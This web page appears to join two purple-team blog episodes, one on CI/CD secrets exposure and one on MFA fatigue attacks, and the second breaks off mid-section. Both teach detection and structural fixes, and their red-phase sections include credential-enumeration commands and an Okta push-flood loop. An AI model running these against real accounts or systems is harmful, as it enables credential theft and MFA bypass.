CI/CD Secrets Exposure: How Supply Chain Attacks Target Your Pipeline

Reading Time: 11 minutes

What is purple team securityOWASP Top 10 mapped to cloud infrastructureCloud security breaches 2020–2025Broken access control in AWSMFA fatigue attacksCI/CD secrets exposure


TL;DR

  • CI/CD secrets exposure is OWASP A08 + A02: credentials committed to repositories or stored in pipeline environment variables can be exfiltrated when the platform is compromised, and automated scanners find them within seconds of a public commit
  • The CircleCI breach (January 2023): an engineer’s laptop was compromised via malware → session token stolen → attacker accessed CircleCI production systems → all customer environment variables (AWS keys, GitHub tokens, SSH keys) exfiltrated
  • The structural problem: long-lived credentials stored in a CI/CD platform are only as secure as the platform itself — if the platform is compromised, all stored secrets are compromised
  • The structural fix: OIDC workload identity replaces stored credentials with short-lived tokens issued at job runtime — there is nothing to exfiltrate
  • Pre-commit hooks and CI-layer secret scanning are detection layers, not structural fixes — they catch accidents, not determined attackers
  • Automated secret scanners (TruffleHog, Gitleaks) find credentials in public repos within 60–90 seconds of commit

OWASP Mapping: A08 Software and Data Integrity Failures — build pipeline integrity. A02 Cryptographic Failures — secrets stored in ways that allow exfiltration.


The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│                  CI/CD SECRETS ATTACK SURFACE                       │
│                                                                     │
│   VECTOR 1: COMMITTED TO VCS                                        │
│   Developer ── git commit ──▶ .env with AWS_SECRET_KEY              │
│   Automated scanner ──────▶  clones within 60 seconds              │
│   Attacker ───────────────▶  accesses AWS before dev notices        │
│                                                                     │
│   VECTOR 2: STORED IN CI/CD PLATFORM                                │
│   DevOps ─── configures ──▶  AWS_ACCESS_KEY_ID in CircleCI         │
│   Attacker compromises CircleCI → exfiltrates all org env vars      │
│                                                                     │
│   VECTOR 3: IN CONTAINER/PROCESS ENV                                │
│   kubectl exec / docker inspect ──▶  printenv shows credentials     │
│   Anyone with container exec access = credential access             │
│                                                                     │
│   VECTOR 4: IN BUILD ARTIFACTS / LOGS                               │
│   Build log: "Using token: ghp_xxxxxxxxxxxx..." → exposed in log   │
│                                                                     │
│   ═══════════════════════════════════════════════════════           │
│   STRUCTURAL FIX: OIDC WORKLOAD IDENTITY                            │
│   No stored credential → nothing to commit, nothing to exfiltrate  │
│   CI job requests token at runtime → 1-hour TTL → expired          │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘

CI/CD secrets exposure is not primarily a developer discipline problem — it is a structural problem. When credentials are stored in a CI/CD platform, in environment variables, or in version control, the only question is when they will be exposed, not whether. The structural answer replaces stored credentials with dynamically issued, short-lived tokens that cannot be exfiltrated because they don’t persist.


The 25-Minute Compromise: How Automated Scanning Works Against You

At 2:47 AM, a developer committed a .env file to a public GitHub repository. It contained:

DATABASE_URL=postgres://admin:prod_p@[email protected]:5432/customers
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
STRIPE_SECRET_KEY=sk_live_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
GITHUB_TOKEN=ghp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

At 2:48 AM — 60 seconds later — an automated scanner had cloned the repository. These scanners run continuously against GitHub’s public event stream, looking for credential patterns in new commits, new files, and new repository forks.

At 3:12 AM — 25 minutes after the commit — the database started receiving unusual queries. The automated scanning infrastructure is not operated by individuals manually watching for leaks. It is fully automated: pattern match → clone → test credential validity → if valid, begin exploitation or sell.

GitHub now runs its own secret scanning and immediately invalidates some credential types (GitHub tokens, AWS IAM keys partnered with AWS) when detected in public repositories. This covers a subset of credential types. It does not cover database passwords, service-specific tokens for non-partnered services, or private repository commits that become public via fork.


The CircleCI Breach: Platform-Level Credential Exfiltration

The CircleCI breach (January 2023) is the definitive example of CI/CD platform-level secrets exposure. The attack chain:

1. CircleCI engineer's laptop compromised via malware (initial vector not fully disclosed)
2. Malware steals a 2FA-authenticated SSO session token
3. Session token valid, not expired
4. Attacker uses session token to authenticate to CircleCI internal systems
5. From internal access, attacker reaches production database
6. Production database contains encrypted customer secrets (environment variables)
7. Database also contains the encryption keys (in accessible internal system)
8. Attacker exfiltrates: encrypted secrets + encryption keys = plaintext secrets

What was stored in CircleCI environment variables by customers:
– AWS IAM access key ID and secret access key pairs
– GitHub personal access tokens and OAuth tokens
– DockerHub credentials
– SSH private keys (for deployment access)
– Heroku API keys
– Stripe, Twilio, SendGrid API keys
– Internal service account credentials

CircleCI could not determine which customer secrets were accessed and which were not — they notified all customers to rotate all credentials stored in their system.

The scale of the blast radius: Any customer who had stored long-lived credentials in CircleCI environment variables was potentially compromised. The credential was valid. The CircleCI platform’s encryption only protected against offline attacks — an attacker with internal database access and access to the key management system had everything needed to decrypt.


Red Phase: Enumerating Secrets Exposure in Your Pipeline

Scanning Repositories for Committed Secrets

# Install: pip install trufflehog3 or use the Docker image
docker run --rm \
  -v "$(pwd):/repo" \
  trufflesecurity/trufflehog:latest \
  git file:///repo \
  --json \
  --only-verified \
  2>/dev/null | \
  jq '{
    file: .SourceMetadata.Data.Git.file,
    commit: .SourceMetadata.Data.Git.commit,
    detector: .DetectorName,
    verified: .Verified,
    line: .SourceMetadata.Data.Git.line
  }'
# Gitleaks: alternative scanner with SARIF output for CI integration
gitleaks detect \
  --source . \
  --report-format sarif \
  --report-path gitleaks-report.sarif \
  --verbose

# Or: scan entire git history (catches secrets that were committed then deleted)
gitleaks detect \
  --source . \
  --log-opts="--all" \
  --report-format json \
  --report-path gitleaks-history.json
# Scan a specific GitHub organization's public repositories
# (test your own org before red team exercises)
trufflehog github \
  --org your-github-org \
  --token "${GITHUB_TOKEN}" \
  --json \
  --only-verified \
  2>/dev/null | \
  jq '{
    repo: .SourceMetadata.Data.Github.repository,
    file: .SourceMetadata.Data.Github.file,
    detector: .DetectorName,
    verified: .Verified
  }'

Enumerating Secrets in CI/CD Platform Environment Variables

# GitHub Actions: list secrets defined in a repository
# (shows names only — values are not returned by API, but names reveal what's stored)
curl -H "Authorization: Bearer ${GITHUB_TOKEN}" \
  -H "Accept: application/vnd.github+json" \
  "https://api.github.com/repos/your-org/your-repo/actions/secrets" | \
  jq '.secrets[] | {name: .name, updated: .updated_at}'

# GitHub Actions: list organization-level secrets
curl -H "Authorization: Bearer ${GITHUB_TOKEN}" \
  -H "Accept: application/vnd.github+json" \
  "https://api.github.com/orgs/your-org/actions/secrets" | \
  jq '.secrets[] | {name: .name, visibility: .visibility, updated: .updated_at}'
# Check for credentials in running pod environment variables (Kubernetes)
# This is what an attacker with kubectl exec access would do
kubectl get pods -A -o json | \
  jq -r '.items[] | 
    .metadata.namespace + "/" + .metadata.name + ": " + 
    ([.spec.containers[].env[]? | 
      select(.name | test("KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL|API"; "i")) |
      .name
    ] | join(", "))' | \
  grep -v ": $"  # Only show pods with matching env var names

Testing Whether AWS Keys in CI/CD Are Over-Permissioned

# If you find an AWS access key in a scan — test its permissions
# (on your own test account's keys only)
aws sts get-caller-identity
# Returns: account, user/role ARN, caller ID

# What can this key do?
aws iam simulate-principal-policy \
  --policy-source-arn $(aws sts get-caller-identity --query Arn --output text) \
  --action-names "s3:*" "ec2:*" "iam:*" "sts:AssumeRole" \
  --query 'EvaluationResults[?EvalDecision==`allowed`].EvalActionName' \
  --output text

Blue Phase: Detection Across the Secret Lifecycle

GitHub Secret Scanning Alerts

# List secret scanning alerts in a repository via GitHub API
curl -H "Authorization: Bearer ${GITHUB_TOKEN}" \
  -H "Accept: application/vnd.github+json" \
  "https://api.github.com/repos/your-org/your-repo/secret-scanning/alerts?state=open" | \
  jq '.[] | {
    type: .secret_type,
    state: .state,
    created: .created_at,
    url: .html_url
  }'

CloudTrail: Detecting API Activity from CI/CD Credentials

When a CI/CD credential is used by an attacker, the CloudTrail events show unusual patterns:

# Find API calls from CI/CD credentials outside normal working hours
# or from unexpected IPs (attacker using the stolen key)
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=Username,AttributeValue=ci-deploy-user \
  --start-time "$(date -d '7 days ago' --iso-8601=seconds)" \
  --query 'Events[].{Time:EventTime,Name:EventName,IP:CloudTrailEvent}' \
  --output json | \
  jq '.[] | {
    time: .Time,
    event: .Name,
    ip: (.IP | fromjson | .sourceIPAddress),
    user_agent: (.IP | fromjson | .userAgent)
  }' | \
  jq 'select(.ip | test("^(10\\.|172\\.(1[6-9]|2[0-9]|3[01])\\.|192\\.168\\.)") | not)'
  # Filter: events from non-RFC1918 IPs (outside your known CI/CD IP ranges)

SIEM Query: Credential Used in Multiple Regions Simultaneously

A credential being used from multiple regions simultaneously is a strong indicator of compromise:

-- Athena query against CloudTrail logs
-- Detect: same access key used from multiple regions in same hour
SELECT
  userIdentity.accessKeyId,
  userIdentity.userName,
  COUNT(DISTINCT awsRegion) as region_count,
  ARRAY_AGG(DISTINCT awsRegion) as regions,
  COUNT(DISTINCT sourceIPAddress) as ip_count,
  ARRAY_AGG(DISTINCT sourceIPAddress) as source_ips,
  DATE_TRUNC('hour', from_iso8601_timestamp(eventTime)) as hour
FROM cloudtrail_logs
WHERE
  userIdentity.type = 'IAMUser'
  AND from_iso8601_timestamp(eventTime) > current_timestamp - interval '7' day
GROUP BY
  userIdentity.accessKeyId,
  userIdentity.userName,
  DATE_TRUNC('hour', from_iso8601_timestamp(eventTime))
HAVING COUNT(DISTINCT awsRegion) > 2
ORDER BY region_count DESC;

GuardDuty: Credential Exfiltration Indicators

# GuardDuty findings relevant to CI/CD credential compromise
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty list-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-criteria '{
    "Criterion": {
      "type": {
        "Equals": [
          "UnauthorizedAccess:IAMUser/TorIPCaller",
          "UnauthorizedAccess:IAMUser/MaliciousIPCaller",
          "Discovery:IAMUser/AnomalousBehavior",
          "Exfiltration:IAMUser/AnomalousBehavior",
          "CredentialAccess:IAMUser/AnomalousBehavior"
        ]
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-ids | \
  jq '.Findings[] | {type: .Type, user: .Resource.AccessKeyDetails.UserName, severity: .Severity}'

Purple Phase: The Structural Fix

Fix 1: OIDC Workload Identity — Eliminate Stored Credentials

This is the structural solution. Instead of storing an AWS IAM access key in your CI/CD platform, the CI/CD job authenticates to AWS using an OIDC token issued by the CI/CD provider. AWS validates the token against a pre-configured trust policy and issues temporary credentials valid for the duration of the job.

The OIDC workload identity approach eliminates static cloud access keys entirely — there is no secret to commit, no secret to exfiltrate from the CI/CD platform, and no long-lived credential to rotate on breach.

GitHub Actions with AWS OIDC — complete setup:

# .github/workflows/deploy.yml
name: Deploy to AWS

on:
  push:
    branches: [main]

permissions:
  id-token: write   # Required for OIDC token request
  contents: read

jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Configure AWS credentials via OIDC
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::123456789012:role/github-actions-deploy-role
          role-session-name: github-actions-${{ github.run_id }}
          aws-region: us-east-1
          # No AWS_ACCESS_KEY_ID or AWS_SECRET_ACCESS_KEY needed

      - name: Deploy
        run: aws s3 sync ./dist s3://your-bucket/

AWS IAM trust policy for GitHub Actions OIDC:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::123456789012:oidc-provider/token.actions.githubusercontent.com"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
        },
        "StringLike": {
          "token.actions.githubusercontent.com:sub": "repo:your-org/your-repo:ref:refs/heads/main"
        }
      }
    }
  ]
}
# Create the OIDC provider in AWS (one-time setup)
aws iam create-open-id-connect-provider \
  --url https://token.actions.githubusercontent.com \
  --client-id-list sts.amazonaws.com \
  --thumbprint-list "6938fd4d98bab03faadb97b34396831e3780aea1"

# Create the IAM role with the trust policy above
aws iam create-role \
  --role-name github-actions-deploy-role \
  --assume-role-policy-document file://github-actions-trust-policy.json

# Attach a least-privilege policy to the role
aws iam attach-role-policy \
  --role-name github-actions-deploy-role \
  --policy-arn arn:aws:iam::123456789012:policy/deploy-policy

Fix 2: Pre-Commit Hooks — Catch Accidents Before They Reach VCS

Pre-commit hooks don’t stop a determined attacker. They catch accidents — the developer who forgets to move a .env file to .gitignore before staging all files.

# Install pre-commit framework
pip install pre-commit

# .pre-commit-config.yaml in your repository root
cat > .pre-commit-config.yaml << 'EOF'
repos:
  - repo: https://github.com/gitleaks/gitleaks
    rev: v8.18.4
    hooks:
      - id: gitleaks
        name: Detect hardcoded secrets
        entry: gitleaks protect --staged --redact --verbose
        language: golang
        pass_filenames: false

  - repo: https://github.com/pre-commit/pre-commit-hooks
    rev: v4.5.0
    hooks:
      - id: detect-private-key
      - id: check-added-large-files
        args: ['--maxkb=1000']
EOF

# Install the hooks in the local repository
pre-commit install

# Test against staged files
pre-commit run --all-files

Fix 3: CI-Layer Secret Scanning — Block Before Merge

# GitHub Actions: secret scanning as a required status check
# .github/workflows/secret-scan.yml
name: Secret Scan

on:
  pull_request:
    types: [opened, synchronize]

jobs:
  secret-scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0  # Full history for git log scanning

      - name: Run TruffleHog
        uses: trufflesecurity/trufflehog@main
        with:
          path: ./
          base: ${{ github.event.repository.default_branch }}
          head: HEAD
          extra_args: --only-verified --json
# GitLab CI: secret detection built-in template
include:
  - template: Security/Secret-Detection.gitlab-ci.yml

secret_detection:
  stage: test
  variables:
    SECRET_DETECTION_HISTORIC_SCAN: "true"  # Scan full history

Fix 4: Audit and Rotate Existing CI/CD Platform Secrets

After implementing OIDC, the migration path for existing stored credentials:

#!/bin/bash
# Purple Team EP06 — CI/CD Secrets Migration Audit
# Identifies AWS IAM keys stored in CI/CD that should be replaced with OIDC

echo "=== AWS IAM Keys Potentially Stored in CI/CD ==="
echo "--- Keys not used from expected CI/CD IPs in last 30 days ---"

# Get all IAM access keys
aws iam list-users --query 'Users[].UserName' --output text | tr '\t' '\n' | \
  while read user; do
    keys=$(aws iam list-access-keys --user-name "$user" \
      --query 'AccessKeyMetadata[?Status==`Active`].{Key:AccessKeyId,Created:CreateDate}' \
      --output json)

    if [ "$(echo "$keys" | jq length)" -gt 0 ]; then
      echo ""
      echo "User: $user"
      echo "$keys" | jq -r '.[] | "  Key: " + .Key + " | Created: " + .Created'

      # Check last used
      echo "$keys" | jq -r '.[].Key' | while read key_id; do
        last_used=$(aws iam get-access-key-last-used --access-key-id "$key_id" \
          --query 'AccessKeyLastUsed.{Date:LastUsedDate,Service:ServiceName,Region:Region}' \
          --output json)
        echo "  Last used: $(echo "$last_used" | jq -r '.Date // "Never"') | Service: $(echo "$last_used" | jq -r '.Service // "N/A"')"
      done
    fi
  done

echo ""
echo "=== MIGRATION CHECKLIST ==="
echo "  1. For each CI/CD IAM key above:"
echo "     a. Identify which CI/CD platform uses it"
echo "     b. Set up OIDC trust policy for that platform"
echo "     c. Update pipeline to use OIDC (no stored key)"
echo "     d. Disable and then delete the IAM key"
echo "     e. Verify pipelines still work"

Run This in Your Own Environment: Secrets Exposure Audit

#!/bin/bash
# Purple Team EP06 — CI/CD Secrets Exposure Audit
# Run from your workstation with git and trufflehog installed

echo "=== 1. Scan Local Repository for Committed Secrets ==="
if command -v trufflehog > /dev/null 2>&1; then
  trufflehog git file://$(pwd) --only-verified --json 2>/dev/null | \
    jq '{file: .SourceMetadata.Data.Git.file, detector: .DetectorName}' || \
    echo "  No verified secrets found in git history"
else
  echo "  Install trufflehog: pip install trufflehog3"
fi

echo ""
echo "=== 2. Check for .env Files in Git History ==="
git log --all --full-history -- "*.env" "**/.env" ".env.*" 2>/dev/null | \
  grep "^commit" | head -5 | \
  while read _ commit; do
    echo "  .env file committed: $commit"
    git show "$commit" --stat | head -3
  done

echo ""
echo "=== 3. Check Running Pods for Credential Env Vars (Kubernetes) ==="
if command -v kubectl > /dev/null 2>&1; then
  kubectl get pods -A -o json 2>/dev/null | \
    jq -r '.items[] | 
      .metadata.namespace + "/" + .metadata.name + ": " + 
      ([.spec.containers[].env[]? | 
        select(.name | test("KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL"; "i")) |
        .name
      ] | join(", "))' | \
    grep -v ": $" | head -20
else
  echo "  kubectl not found"
fi

echo ""
echo "=== 4. GitHub Actions Secrets Inventory ==="
if [ -n "${GITHUB_TOKEN}" ]; then
  REPO="your-org/your-repo"  # Update this
  curl -s -H "Authorization: Bearer ${GITHUB_TOKEN}" \
    -H "Accept: application/vnd.github+json" \
    "https://api.github.com/repos/${REPO}/actions/secrets" | \
    jq '.secrets[] | {name: .name, updated: .updated_at}'
else
  echo "  Set GITHUB_TOKEN to enumerate repository secrets"
fi

⚠ Common Mistakes When Addressing CI/CD Secrets Exposure

Treating secret scanning as the primary control. TruffleHog and Gitleaks catch what gets committed. They do not prevent the CircleCI attack class — an attacker who compromises the CI/CD platform itself bypasses all scanning controls. Scanning is detection; OIDC workload identity is prevention.

Rotating compromised keys without checking CloudTrail for use. When a secret is exposed, the first question is not “rotate it” — it is “was it used?” Check CloudTrail for any API activity from the key between the suspected exposure time and the rotation. If the key was used, you have an active incident, not just a credential rotation task.

Using OIDC trust policies that are too broad. The GitHub Actions OIDC trust policy in the fix section uses a StringLike condition on the sub claim to scope to a specific repository and branch. If you use StringLike: "*" instead, any GitHub Actions job in any repository can assume your role. Always scope OIDC trust policies to the specific repository, branch, and environment that needs the access.

Not scanning git history — only the working tree. Secrets that were committed and then deleted are still in git history. git rm removes the file from the working tree but not from the object store. TruffleHog and Gitleaks scan history by default when given the --all flag. Scanning only the current working tree misses all historical exposures.

Forgetting third-party GitHub Actions. The supply chain attack surface includes the Actions you reference in your workflows. An Action pinned to a mutable tag (@main, @v1) can be changed by the maintainer. Pin to a specific commit SHA and verify the Action’s provenance.

# Vulnerable: mutable tag
- uses: aws-actions/configure-aws-credentials@v4

# Secure: pinned SHA
- uses: aws-actions/configure-aws-credentials@e3dd6a429d7300a6a4c196c26e831c1e4c763fe4

Quick Reference

Secret Storage Pattern Risk Level Structural Fix
.env file committed to public repo Critical Pre-commit hook + OIDC
.env file committed to private repo High Git history purge + pre-commit hook + OIDC
Long-lived key in CI/CD env var High OIDC workload identity
Long-lived key in K8s Secret High Pod identity / IRSA / Workload Identity
Secret in build log output Medium Mask secrets in CI configuration
Secret in container env var Medium Vault agent / CSI secrets driver
Key referenced via AWS Secrets Manager Low (if scoped) Use for remaining static secrets

Key Takeaways

  • CI/CD secrets exposure is structural: long-lived credentials in a CI/CD platform are only as secure as that platform — the CircleCI breach proved that encryption alone is insufficient if the attacker can access the keys
  • Automated secret scanners find publicly committed credentials within 60–90 seconds — rotation must happen faster than that or assume compromise
  • Pre-commit hooks and CI secret scanning catch accidents; they do not prevent determined attackers who compromise the platform itself
  • OIDC workload identity is the structural fix: no stored credential means no credential to exfiltrate
  • When rotating a compromised key, check CloudTrail for usage between exposure and rotation before closing the incident
  • OIDC trust policies must be scoped to specific repositories and branches — a wildcard trust policy recreates the exposure in a different form
  • Pin third-party GitHub Actions to commit SHAs, not mutable tags — mutable tags are a supply chain attack surface

What’s Next

EP07 covers SSRF to cloud metadata: how an SSRF vulnerability in any application layer becomes a straight line to IAM credentials when IMDSv2 is not enforced. The Capital One breach anatomy — WAF SSRF → EC2 metadata → IAM role credentials → 100 million S3 records — in full technical detail, with the simulation commands and the one-line enforcement fix. If you’ve addressed identity and secrets, the network attack paths are where EP07 through EP10 focus.

Get EP07 in your inbox when it publishes → subscribe at linuxcent.com

MFA Fatigue Attacks: How Uber Got Breached and How to Stop It

Reading Time: 10 minutes

What is purple team securityOWASP Top 10 mapped to cloud infrastructureCloud security breaches 2020–2025Broken access control in AWSMFA fatigue attacks


TL;DR

  • An MFA fatigue attack exploits push-notification MFA (Duo, Okta Verify, Microsoft Authenticator) by flooding a user with push requests until they accept one — either out of exhaustion or after social engineering
  • Uber (September 2022): contractor credentials purchased on a criminal marketplace → repeated Duo push notifications → WhatsApp social engineering → push accepted → admin PAM credentials found on internal file share → full access to AWS, GCP, Slack, HackerOne
  • The attack works because push MFA creates a UX habit: “tap accept” is a trained response, not a decision
  • Detection: multiple MFA failures followed by a single success in a short window — Okta System Log, Azure AD Sign-in Log, AWS CloudTrail
  • The structural fix is replacing push MFA with phishing-resistant FIDO2 hardware keys — not security awareness training, not more push notifications, not “number matching” alone
  • Okta (October 2023): support system breach exposed session tokens → attackers bypassed MFA entirely by using stolen session context

OWASP Mapping: A07 Identification and Authentication Failures. The Uber breach is the defining infrastructure example. Okta demonstrates session token theft as a related A07 variant.


The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│                    MFA FATIGUE ATTACK ANATOMY                       │
│                                                                     │
│   STEP 1: OBTAIN CREDENTIALS                                        │
│   Attacker ──── phish / buy on market ──────▶ username + password  │
│                                                                     │
│   STEP 2: TRIGGER MFA FLOOD                                         │
│   Attacker ──── repeated login attempts ────▶ Push #1 → User: NO   │
│                                               Push #2 → User: NO   │
│                                               Push #3 → User: NO   │
│                                               Push #4 → User: ???   │
│                                                                     │
│   STEP 3: SOCIAL ENGINEERING LAYER                                  │
│   Attacker ──── "Hi, I'm from IT support.                           │
│                  Please accept the next push."                      │
│                                               Push #4 → User: YES  │
│                                                                     │
│   STEP 4: ACCESS                                                    │
│   Attacker ──── authenticated session ──────▶ Internal network      │
│                                               Enumerate shares      │
│                                               Find next credential  │
│                                                                     │
│   ═══════════════════════════════════════════════════════           │
│   WHY TRAINING DOESN'T HELP:                                        │
│   Push MFA trains users to tap accept. The attacker exploits        │
│   the trained behavior. Education competes with habit.              │
│                                                                     │
│   WHY HARDWARE KEYS DO:                                             │
│   FIDO2 requires physical presence. WhatsApp message                │
│   cannot accept a hardware key challenge.                           │
└─────────────────────────────────────────────────────────────────────┘

An MFA fatigue attack is how you bypass multi-factor authentication without breaking encryption or stealing the MFA seed — you exploit the user’s psychology and the UX of push-notification systems. The attacker knows the password. The only thing standing between them and access is the user’s willingness to tap “deny” indefinitely.


The Uber Breach: Anatomy Minute by Minute

September 15, 2022. The attacker’s capabilities: a purchased credential set for an Uber contractor account, a phone number, and patience.

The credential acquisition: Uber contractor credentials were available on criminal marketplaces. The attacker obtained a valid username and password for an Uber contractor’s Uber corporate account.

The MFA flood:

The contractor’s account had Duo push-based MFA enrolled. The attacker initiated login attempts repeatedly, triggering a sequence of Duo push notifications to the contractor’s phone. The contractor rejected three or four of them. At this point, most attacks would stop — but the attacker added a social engineering layer.

The WhatsApp message:

The attacker sent a WhatsApp message to the contractor’s number, claiming to be from Uber IT support:

“Hi, this is the Uber IT support team. We’re seeing some issues with your account and need you to approve the next Duo notification to verify your identity.”

The contractor accepted the next push notification.

Post-authentication enumeration:

With an authenticated session, the attacker accessed Uber’s internal network. On an internal network share accessible to contractors, they found a PowerShell script. In that script: hardcoded Thycotic admin credentials. Thycotic is a Privileged Access Management (PAM) system — it stores credentials for privileged accounts across an organization.

The blast radius:

With Thycotic admin access, the attacker retrieved credentials for:
– AWS IAM accounts
– GCP service accounts
– Google Workspace admin
– VMware vSphere
– Slack workspace admin
– HackerOne bug bounty program admin (including details of open security reports)

The entire Uber infrastructure was accessible from one contractor’s push notification acceptance.

What Uber’s logs showed:

2022-09-15T02:17:00Z  [Duo] [email protected]  action=push_sent  result=rejected
2022-09-15T02:17:45Z  [Duo] [email protected]  action=push_sent  result=rejected
2022-09-15T02:18:30Z  [Duo] [email protected]  action=push_sent  result=rejected
2022-09-15T02:19:15Z  [Duo] [email protected]  action=push_sent  result=rejected
2022-09-15T02:22:00Z  [Duo] [email protected]  action=push_sent  result=approved
2022-09-15T02:22:05Z  [VPN] [email protected]  connection=established  ip=<attacker>

Four rejections followed by one approval in a five-minute window. This is a detectable pattern — but only if someone is looking for it.


Red Phase: Simulating MFA Fatigue

What the Attack Looks Like in Tooling

MFA fatigue attacks are conducted manually — an attacker with valid credentials and knowledge of which MFA system the target uses. No special tooling is required for the attack itself. What can be simulated:

Option 1: Repeated legitimate login attempts (test account only)

# DO NOT run against production accounts or accounts you don't own

# Using Okta API to authenticate (test environment only)
TEST_USERNAME="[email protected]"
TEST_PASSWORD="TestPassword123!"
OKTA_DOMAIN="your-org.okta.com"

for i in {1..5}; do
  echo "Attempt $i at $(date +%T)"
  response=$(curl -s -X POST \
    "https://${OKTA_DOMAIN}/api/v1/authn" \
    -H "Content-Type: application/json" \
    -d "{\"username\": \"${TEST_USERNAME}\", \"password\": \"${TEST_PASSWORD}\"}")

  status=$(echo "$response" | jq -r '.status')
  echo "  Status: $status"

  if [ "$status" = "MFA_CHALLENGE" ]; then
    state_token=$(echo "$response" | jq -r '.stateToken')
    factor_id=$(echo "$response" | jq -r '._embedded.factors[] | select(.factorType == "push") | .id')
    echo "  Factor ID: $factor_id (push notification triggered)"

    # In a real attack, the attacker would poll for the MFA response:
    echo "  Waiting 10 seconds for user to respond..."
    sleep 10
  fi

  sleep 30  # Wait between attempts to avoid rate limiting
done

Option 2: Tabletop exercise (no credentials required)

For organizations that cannot run live credential tests, the tabletop simulation maps the attack against your specific IdP logs. Pull 30 days of authentication logs and look for the pattern:

# Okta System Log: find users with multiple MFA failures followed by success
curl -H "Authorization: SSWS ${OKTA_API_TOKEN}" \
  "https://your-org.okta.com/api/v1/logs?filter=eventType+eq+\"user.authentication.auth_via_mfa\"&limit=1000" | \
  jq '
    group_by(.actor.id) |
    map({
      user: .[0].actor.displayName,
      total: length,
      failures: [.[] | select(.outcome.result == "FAILURE")] | length,
      successes: [.[] | select(.outcome.result == "SUCCESS")] | length
    }) |
    sort_by(.failures) |
    reverse |
    .[0:20]
  '

Users with high failure counts followed by eventual success are the fatigue attack pattern. Some will be legitimate (user locked themselves out, then called IT). The ones to investigate are those where the failure-to-success sequence happened in a short window (under 30 minutes) and from an unusual IP.


Blue Phase: Detection Across Identity Providers

Okta: Push Notification Flood

# Okta System Log — detect repeated push failures from same user
# Query for: >3 push failures within 10 minutes for same user
curl -H "Authorization: SSWS ${OKTA_API_TOKEN}" \
  "https://your-org.okta.com/api/v1/logs?filter=eventType+eq+\"user.authentication.auth_via_mfa\"+and+outcome.result+eq+\"FAILURE\"&since=$(date -u -d '24 hours ago' +%Y-%m-%dT%H:%M:%SZ)" | \
  jq '
    group_by(.actor.id, (.published[0:16])) |
    map(select(length >= 3)) |
    map({
      user: .[0].actor.displayName,
      window: .[0].published[0:16],
      failure_count: length,
      ips: [.[].client.ipAddress] | unique
    })
  '

Azure AD: Conditional Access Logs

# Azure AD: MFA push denial flood detection (using Azure CLI)
az monitor activity-log list \
  --start-time "$(date -u -d '24 hours ago' +%Y-%m-%dT%H:%M:%SZ)" \
  --query "[?contains(operationName.value, 'MFA')].{user:caller,time:eventTimestamp,result:status.value}" \
  --output table

In Microsoft Sentinel, the detection rule for MFA fatigue:

// Azure AD MFA Fatigue Detection — Sentinel KQL
SigninLogs
| where TimeGenerated > ago(24h)
| where AuthenticationRequirement == "multiFactorAuthentication"
| where ResultType != "0"  // Non-success
| summarize
    FailureCount = count(),
    SuccessCount = countif(ResultType == "0"),
    IPs = make_set(IPAddress),
    StartTime = min(TimeGenerated),
    EndTime = max(TimeGenerated)
    by UserPrincipalName, bin(TimeGenerated, 10m)
| where FailureCount >= 3
| where SuccessCount >= 1
| where datetime_diff('minute', EndTime, StartTime) <= 30
| project UserPrincipalName, FailureCount, SuccessCount, IPs, StartTime, EndTime
| order by FailureCount desc

AWS CloudTrail: Console Session After MFA Flood

If your organization uses AWS SSO (IAM Identity Center) with an external IdP, the CloudTrail event that matters is the console login event immediately following the MFA success:

# Find AWS console login events from unusual IPs
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=ConsoleLogin \
  --start-time "$(date -d '24 hours ago' --iso-8601=seconds)" \
  --query 'Events[].{Time:EventTime,User:Username,IP:CloudTrailEvent}' \
  --output json | \
  jq '.[] | {
    time: .Time,
    user: .User,
    ip: (.IP | fromjson | .sourceIPAddress),
    mfa: (.IP | fromjson | .additionalEventData.MFAUsed)
  }'

What a GuardDuty Alert Looks Like for This Attack

GuardDuty does not generate a specific finding for MFA fatigue (it does not have visibility into IdP logs). What it may catch downstream:

  • UnauthorizedAccess:IAMUser/ConsoleLoginSuccess.B — console login from unusual geographic location or Tor exit node
  • Discovery:IAMUser/AnomalousBehavior — if the attacker begins enumerating IAM after console access

The gap: GuardDuty’s behavioral analysis is per-account. If the attacker logs in using valid credentials and MFA, GuardDuty may not flag the initial access — only downstream actions that deviate from baseline.


Purple Phase: The Structural Fix

Fix 1: Replace Push MFA with FIDO2 Hardware Keys (for Tier-0 Accounts)

This is the only structural fix. MFA fatigue attacks work because push notifications can be approved by a human who is socially engineered. FIDO2 hardware keys (YubiKey, Google Titan, etc.) require physical possession of the key and a user gesture (touch). A WhatsApp message cannot substitute for physical key presence.

# Okta: Require hardware key MFA for admin accounts
# (done via Okta Admin Console → Security → Authentication Policies)
# CLI example using Okta API:

# Create a new authentication policy requiring hardware authenticator
curl -X POST \
  "https://your-org.okta.com/api/v1/policies" \
  -H "Authorization: SSWS ${OKTA_API_TOKEN}" \
  -H "Content-Type: application/json" \
  -d '{
    "name": "Admin Hardware Key Policy",
    "type": "ACCESS_POLICY",
    "status": "ACTIVE",
    "description": "Requires FIDO2 hardware key for admin access"
  }'

Phasing hardware keys across an organization:

